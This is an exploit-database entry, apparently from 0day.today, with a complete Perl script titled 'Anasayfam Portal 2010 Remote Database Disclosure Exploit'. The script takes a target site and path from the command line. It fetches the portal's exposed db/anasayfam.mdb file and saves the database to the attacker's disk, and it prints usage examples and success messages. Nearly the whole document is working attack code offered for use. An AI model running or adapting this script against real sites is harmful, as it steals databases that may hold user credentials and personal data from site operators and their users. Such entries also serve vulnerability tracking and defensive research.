Anasayfam Portal 2010 Remote Database Disclosure Exploit

2010-08-19T00:00:00
ID 1337DAY-ID-13761
Type zdt
Reporter BARCOD3
Modified 2010-08-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================================
Anasayfam Portal 2010 Remote Database Disclosure Exploit
========================================================

#!/usr/bin/perl -w
#
# Anasayfam Portal 2010 / Database Disclosure Exploit
#
# Coded: BARCOD3
# 
#
#
#
# Thanks: DaiMon, KnocKout, NeT-Excellans all Logystics.
#
 
 
 
use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title Anasayfam Portal 2010 Remote Database Disclosure Exploit');
system('color 4');


if(@ARGV < 2)
{
print "[-]Example Exp.\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* Anasayfam 2010 Remote Database Disclosure Exploit              *\n";
print "\* auth0r : BARCOD3                                                  *\n";
print "\* contact :   ozk4nbozkurt[at]hotmail[dot]com                                 *\n";
print "\* Special thx. DaiMon, KnocKout, NeT-Excellans all Logystics.                         *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="db/anasayfam.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/anasayfam.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/anasayfam.mdb\n";
exit();
}
else
{
print "[!] Dur la dur sakin ol $url olmadi bu !\n[!] ".$request->status_line."\n";
exit();
}



#  0day.today [2018-02-06]  #